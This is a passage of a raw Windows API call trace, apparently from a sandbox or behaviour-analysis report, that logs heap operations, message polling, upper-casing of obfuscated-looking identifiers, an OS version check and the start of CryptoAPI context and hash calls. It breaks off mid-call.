| out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0150.036] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.036] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0150.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.037] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.037] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0150.037] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.037] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0150.037] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.038] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0150.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.038] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0150.039] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.039] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.039] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0150.039] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.039] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.040] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0150.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0150.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.040] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.040] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.040] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.040] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.040] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0150.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0150.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0150.040] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bea28) returned 1 [0150.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.041] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0150.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.041] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0150.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.041] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.042] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.042] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.042] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.042] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.042] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.042] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.048] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.048] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.048] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.048] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa438, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0150.049] CryptCreateHash (in: 